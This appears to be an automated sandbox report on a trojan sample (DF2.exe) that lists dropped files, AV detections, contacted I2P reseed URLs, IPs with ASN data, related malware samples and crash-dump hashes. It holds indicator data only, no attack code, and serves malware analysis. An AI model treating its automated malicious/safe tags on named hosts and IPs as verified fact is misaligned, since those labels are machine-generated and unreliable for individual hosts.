C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe70%ReversingLabsWin64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe58%ReversingLabsWin64.Trojan.Alevaul
C:\Windows\Temp\2s3EMNnh0%ReversingLabs
C:\Windows\Temp\5P46VR1V8%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\6KasAPG026%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\DiEI7oU170%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\DkzUMxZ83%ReversingLabs
C:\Windows\Temp\LcUJSdZq8%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\YERHbDgw3%ReversingLabs
C:\Windows\Temp\bT51Gn7Q3%ReversingLabs
C:\Windows\Temp\yGODxgsj32%ReversingLabsWin64.Trojan.Generic
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://reseed-fr.i2pd.xyz/0%Avira URL Cloudsafe
https://i2pseed.creativecowpat.net:8443/0%Avira URL Cloudsafe
http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su30%Avira URL Cloudsafe
https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
https://netdb.i2p2.no/100%Avira URL Cloudmalware
https://banana.incognet.io/;0%Avira URL Cloudsafe
https://reseed.stormycloud.org/s0%Avira URL Cloudsafe
https://i2p.novg.net/0%Avira URL Cloudsafe
https://www2.mk16.de/760%Avira URL Cloudsafe
https://reseed.memcpy.io/0%Avira URL Cloudsafe
https://reseed2.i2p.net/r100%Avira URL Cloudmalware
https://i2p.ghativega.in/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtn0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/0%Avira URL Cloudsafe
https://reseed.i2pgit.org/100%Avira URL Cloudmalware
https://reseed.i2pgit.org/9100%Avira URL Cloudmalware
https://www2.mk16.de/0%Avira URL Cloudsafe
http://reg.i2p/hosts.txt0%Avira URL Cloudsafe
https://i2pseed.creativecowpat.net:8443/i0%Avira URL Cloudsafe
https://reseed.stormycloud.org/I0%Avira URL Cloudsafe
https://reseed.stormycloud.org/E0%Avira URL Cloudsafe
http://reg.i2p/hosts.txtC0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
http://127.0.0.1:81180%Avira URL Cloudsafe
http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
https://reseed.onion.im/60%Avira URL Cloudsafe
https://reseed.diva.exchange/100%Avira URL Cloudmalware
http://identiguy.i2p/hosts.txt0%Avira URL Cloudsafe
https://reseed.stormycloud.org/T0%Avira URL Cloudsafe
https://www2.mk16.de/80%Avira URL Cloudsafe
https://reseed.onion.im/0%Avira URL Cloudsafe
https://reseed.stormycloud.org/0%Avira URL Cloudsafe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%Avira URL Cloudsafe
https://legit-website.com/i2pseeds.su30%Avira URL Cloudsafe
https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
https://reseed.memcpy.io/b.ci0%Avira URL Cloudsafe
https://reseed2.i2p.net/100%Avira URL Cloudmalware
https://reseed.i2pgit.org:443/i2pseeds.su3100%Avira URL Cloudmalware
https://reseed.i2pgit.org/i2pseeds.su3100%Avira URL Cloudmalware
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://0%Avira URL Cloudsafe
https://banana.incognet.io/0%Avira URL Cloudsafe
https://i2p.ghativega.in/b.cW0%Avira URL Cloudsafe
http://rus.i2p/hosts.txt0%Avira URL Cloudsafe
https://reseed.stormycloud.org/b0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/d0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
reseed.i2pgit.org
68.183.196.133
truetrue
    unknown
    reseed.diva.exchange
    80.74.145.70
    truetrue
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://reseed-fr.i2pd.xyz/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://i2pseed.creativecowpat.net:8443/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://reseed.stormycloud.org/smain.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://banana.incognet.io/;main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www2.mk16.de/76main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.i2p-projekt.de/nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3main.exe, 00000020.00000003.2599837625.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599705548.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599641838.00000200A08F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2600230754.00000200A0506000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://i2p.novg.net/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://netdb.i2p2.no/nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: malware
      unknown
      https://reseed.memcpy.io/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://i2p.ghativega.in/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://reseed2.i2p.net/rmain.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.i2pgit.org/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: malware
      unknown
      https://www2.mk16.de/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtnmain.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.i2pgit.org/9main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://reseed.stormycloud.org/Imain.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://reg.i2p/hosts.txtupdate.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      https://i2pseed.creativecowpat.net:8443/imain.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.stormycloud.org/Emain.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://reseed-pl.i2pd.xyz/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      http://stats.i2p/cgi-bin/newhosts.txtnju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      http://reg.i2p/hosts.txtCmain.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://127.0.0.1:8118main.exe, 00000020.00000003.2586057584.00000200A04A8000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      http://identiguy.i2p/hosts.txtnju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.onion.im/6main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://reseed.diva.exchange/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: malware
      unknown
      https://reseed.stormycloud.org/Tmain.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://www2.mk16.de/8main.exe, 00000015.00000002.2482716452.000001DE39DB8000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://legit-website.com/i2pseeds.su3nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.onion.im/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://i2p.mooo.com/netDb/nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      https://i2pd.readthedocs.io/en/latest/user-guide/configuration/nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.memcpy.io/b.cimain.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.stormycloud.org/main.exe, main.exe, 00000020.00000002.2913383515.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://reseed2.i2p.net/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: malware
      unknown
      https://reseed.i2pgit.org/i2pseeds.su3main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://reseed.i2pgit.org:443/i2pseeds.su3main.exe, 00000015.00000003.1876236118.000001DE39E3A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000003.1876537527.000001DE39E39000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://banana.incognet.io/main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drtrue
      • Avira URL Cloud: safe
      unknown
      https://reseed-pl.i2pd.xyz/dmain.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://rus.i2p/hosts.txtnju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      https://i2p.ghativega.in/b.cWmain.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.stormycloud.org/bmain.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtupdate.pkg.10.drfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      5.181.20.93
      unknownRussian Federation
      3214XTOMxTomEUtrue
      108.180.0.49
      unknownCanada
      852ASN852CAfalse
      87.180.222.251
      unknownGermany
      3320DTAGInternetserviceprovideroperationsDEfalse
      67.223.218.98
      unknownUnited States
      46632SOUTHWEST-ARKANSAS-TELEPHONE-COOPERATIVEUSfalse
      125.212.237.207
      unknownViet Nam
      38731VTDC-AS-VNVietel-CHTCompamyLtdVNfalse
      15.204.11.249
      unknownUnited States
      71HP-INTERNET-ASUSfalse
      95.164.4.146
      unknownGibraltar
      29632NASSIST-ASGItrue
      81.162.25.200
      unknownRussian Federation
      47530NVTC-ASRUfalse
      110.239.62.148
      unknownAustralia
      9723ISEEK-AS-APiseekCommunicationsPtyLtdAUfalse
      23.137.250.43
      unknownReserved
      397614GTLAKESUSfalse
      50.35.91.100
      unknownUnited States
      27017ZIPLY-FIBER-LEGACY-ASNUSfalse
      157.161.57.70
      unknownSwitzerland
      6772IMPNET-ASCHfalse
      149.106.159.60
      unknownUnited States
      19999UNIONASNUSfalse
      88.228.207.122
      unknownTurkey
      9121TTNETTRtrue
      80.76.34.140
      unknownGermany
      46475LIMESTONENETWORKSUSfalse
      89.35.131.34
      unknownRomania
      39668INTERSAT-ASIonRatiunr33ROtrue
      81.168.83.201
      unknownUnited Kingdom
      12513ECLIPSEGBtrue
      185.82.217.48
      unknownBulgaria
      59729ITL-BGfalse
      162.19.153.65
      unknownUnited States
      209CENTURYLINK-US-LEGACY-QWESTUSfalse
      116.202.17.147
      unknownGermany
      24940HETZNER-ASDEfalse
      107.161.80.18
      unknownUnited States
      8100ASN-QUADRANET-GLOBALUSfalse
      194.54.156.174
      unknownUkraine
      8654CRIMEAINFOCOM-ASUAfalse
      37.120.171.64
      unknownGermany
      197540NETCUP-ASnetcupGmbHDEfalse
      38.40.94.251
      unknownUnited States
      174COGENT-174UStrue
      93.94.147.180
      unknownRussian Federation
      44020CLN-ASRUfalse
      78.46.239.124
      unknownGermany
      24940HETZNER-ASDEfalse
      45.200.148.158
      unknownSeychelles
      328608Africa-on-Cloud-ASZAfalse
      80.74.145.70
      reseed.diva.exchangeSwitzerland
      21069ASN-METANETRoutingpeeringissuesnocmetanetchCHtrue
      194.110.247.42
      unknownunknown
      41108FIRSTROOT-ASDEfalse
      188.120.244.218
      unknownRussian Federation
      29182THEFIRST-ASRUfalse
      78.58.99.133
      unknownLithuania
      8764TELIA-LIETUVALTtrue
      72.68.225.51
      unknownUnited States
      701UUNETUSfalse
      85.24.237.45
      unknownSweden
      8473BAHNHOFhttpwwwbahnhofnetSEfalse
      173.249.2.110
      unknownGermany
      51167CONTABODEfalse
      193.34.123.42
      unknownGermany
      12732GUTCON-NETCarrier51GmbHGutConGmbHDEfalse
      120.26.218.134
      unknownChina
      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
      100.4.223.210
      unknownUnited States
      701UUNETUSfalse
      192.248.182.81
      unknownFrance
      20473AS-CHOOPAUSfalse
      66.176.202.101
      unknownUnited States
      7922COMCAST-7922USfalse
      95.188.183.13
      unknownRussian Federation
      12389ROSTELECOM-ASRUfalse
      173.68.123.78
      unknownUnited States
      701UUNETUStrue
      73.247.24.93
      unknownUnited States
      7922COMCAST-7922USfalse
      85.242.211.221
      unknownPortugal
      3243MEO-RESIDENCIALPTfalse
      51.83.132.16
      unknownFrance
      16276OVHFRfalse
      123.57.221.156
      unknownChina
      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
      68.183.196.133
      reseed.i2pgit.orgUnited States
      14061DIGITALOCEAN-ASNUStrue
      212.116.61.165
      unknownFinland
      13170KPO-ASFItrue
      104.244.227.121
      unknownJamaica
      33576DIG001JMfalse
      195.52.175.104
      unknownGermany
      12312ECOTELDEfalse
      118.211.240.78
      unknownAustralia
      4739INTERNODE-ASInternodePtyLtdAUfalse
      59.110.52.4
      unknownChina
      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
      89.66.70.5
      unknownPoland
      6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
      81.136.49.129
      unknownUnited Kingdom
      2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
      46.0.4.103
      unknownRussian Federation
      34533ESAMARA-ASRUfalse
      190.62.46.158
      unknownEl Salvador
      14754TelguaGTfalse
      68.149.143.121
      unknownCanada
      6327SHAWCAtrue
      82.64.105.181
      unknownFrance
      12322PROXADFRfalse
      173.59.19.119
      unknownUnited States
      701UUNETUSfalse
      IP
      127.0.0.1
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1583067
      Start date and time:2025-01-01 18:09:05 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 9m 12s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:33
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:DF2.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@45/74@2/59
      EGA Information:
      • Successful, ratio: 66.7%
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
      • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.109.210.53, 13.107.246.45, 40.126.32.138
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
      • Execution Graph export aborted for target DF2.exe, PID 6652 because there are no executed function
      • Execution Graph export aborted for target nju2apmx83wqd9u7namsf59y.exe, PID 7028 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size exceeded maximum capacity and may have missing network information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      TimeTypeDescription
      12:09:58API Interceptor199x Sleep call for process: DF2.exe modified
      12:09:59API Interceptor46x Sleep call for process: powershell.exe modified
      12:10:49API Interceptor548x Sleep call for process: main.exe modified
      12:11:17API Interceptor1x Sleep call for process: WerFault.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      23.137.250.43ET5.exeGet hashmaliciousUnknownBrowse
        80.74.145.70file.exeGet hashmaliciousUnknownBrowse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          reseed.diva.exchangefile.exeGet hashmaliciousUnknownBrowse
          • 80.74.145.70
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          SOUTHWEST-ARKANSAS-TELEPHONE-COOPERATIVEUSarmv5l.elfGet hashmaliciousMiraiBrowse
          • 216.238.4.239
          SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elfGet hashmaliciousMiraiBrowse
          • 216.238.3.63
          94.156.8.9-skid.ppc-2024-07-23T17_40_07.elfGet hashmaliciousMirai, MoobotBrowse
          • 216.238.3.83
          skt.arm7.elfGet hashmaliciousMiraiBrowse
          • 216.238.3.95
          MG6OHOu9nZ.elfGet hashmaliciousUnknownBrowse
          • 216.238.4.210
          ji5zq1gsV7.elfGet hashmaliciousUnknownBrowse
          • 216.238.3.63
          rift.arm.elfGet hashmaliciousMiraiBrowse
          • 216.238.3.98
          skid.mpsl-20220826-1703Get hashmaliciousMoobotBrowse
          • 174.137.3.85
          rift.armGet hashmaliciousUnknownBrowse
          • 216.238.4.222
          h4pztwgEUMGet hashmaliciousMiraiBrowse
          • 174.137.3.82
          XTOMxTomEUPalestinian_heritage_-_what_it_is_and_what_its_forms_are_docx.exeGet hashmaliciousUnknownBrowse
          • 5.181.23.41
          3sO4kwopMH.exeGet hashmaliciousGuLoader FormBookBrowse
          • 185.33.94.234
          Swift Copy.exeGet hashmaliciousGuLoader FormBookBrowse
          • 185.33.94.234
          jnnbbMX9Ch.exeGet hashmaliciousGuLoader FormBookBrowse
          • 185.33.94.22
          DUE PAYMENT.exeGet hashmaliciousGuLoader FormBookBrowse
          • 185.33.94.234
          Di5RbqBHf7.exeGet hashmaliciousAsyncRATBrowse
          • 92.60.40.226
          Updated SOA.exeGet hashmaliciousFormBookBrowse
          • 185.33.94.22
          Revised_PO_758869.docxGet hashmaliciousUnknownBrowse
          • 185.255.55.12
          Revised_PO_758869.docxGet hashmaliciousUnknownBrowse
          • 185.255.55.12
          DTAGInternetserviceprovideroperationsDEloligang.sh4.elfGet hashmaliciousMiraiBrowse
          • 91.44.210.141
          loligang.arm7.elfGet hashmaliciousMiraiBrowse
          • 79.243.115.205
          loligang.ppc.elfGet hashmaliciousMiraiBrowse
          • 87.185.17.227
          cbr.x86.elfGet hashmaliciousMiraiBrowse
          • 31.251.56.43
          kwari.ppc.elfGet hashmaliciousUnknownBrowse
          • 80.139.201.94
          kwari.arm.elfGet hashmaliciousUnknownBrowse
          • 62.156.228.146
          kwari.mips.elfGet hashmaliciousUnknownBrowse
          • 93.242.36.29
          kwari.arm7.elfGet hashmaliciousMiraiBrowse
          • 79.208.241.239
          botx.mips.elfGet hashmaliciousMiraiBrowse
          • 37.88.63.120
          botx.arm7.elfGet hashmaliciousMiraiBrowse
          • 84.137.12.71
          ASN852CAloligang.arm7.elfGet hashmaliciousMiraiBrowse
          • 142.59.17.189
          botx.mips.elfGet hashmaliciousMiraiBrowse
          • 205.206.220.171
          x86_64.elfGet hashmaliciousMirai, MoobotBrowse
          • 207.134.12.124
          db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
          • 161.188.161.86
          Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
          • 108.181.61.49
          msgde.exeGet hashmaliciousQuasarBrowse
          • 108.181.61.49
          6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
          • 108.181.61.49
          telnet.sh4.elfGet hashmaliciousUnknownBrowse
          • 75.155.196.115
          armv6l.elfGet hashmaliciousUnknownBrowse
          • 205.250.152.203
          wUSt04rfJ0.exeGet hashmaliciousQuasarBrowse
          • 108.181.61.49
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllET5.exeGet hashmaliciousUnknownBrowse
            C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllET5.exeGet hashmaliciousUnknownBrowse
              C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllET5.exeGet hashmaliciousUnknownBrowse
                Process:C:\Windows\System32\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.9802357899525361
                Encrypted:false
                SSDEEP:192:0r1m6o/d0MALS36jN7EzuiF4iZ24lO8l:4mN/eMALXjNgzuiF4iY4lO8l
                MD5:DC957A6EB6CB842D6C832443FFFB8405
                SHA1:5967A3B9AF1FB4AF8067586F06BBA9400E12505F
                SHA-256:B77C2AF9CBB4E8D015B49B35992E77D9C4A43EC2D55145552492EFE96153D21B
                SHA-512:F6C46EFF373EBE1637904E143A0C73AA975B39C8F6498C0EDDB74ABB5303019DE3C7CB64174E1A09FC3B666A71D95E7A1BB2DAE737F73526DB558A92367A4CFF
                Malicious:true
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.2.2.5.0.6.6.0.8.3.9.5.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.2.2.5.0.6.6.5.0.5.8.1.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.1.4.9.3.f.8.-.8.0.c.0.-.4.c.5.f.-.a.e.8.c.-.b.4.c.0.a.f.e.a.8.1.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.2.a.f.e.0.b.-.c.1.1.1.-.4.6.b.3.-.9.3.9.6.-.1.e.0.2.5.2.b.6.a.7.2.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.0.-.0.0.1.4.-.f.8.1.1.-.5.a.0.6.7.0.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.d.b.8.9.6.1.f.8.a.f.b.9.9.9.a.e.c.e.6.0.b.f.1.e.f.3.e.4.9.e.8.e.2.3.4.9.f.7.b.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.9.
                Process:C:\Windows\System32\WerFault.exe
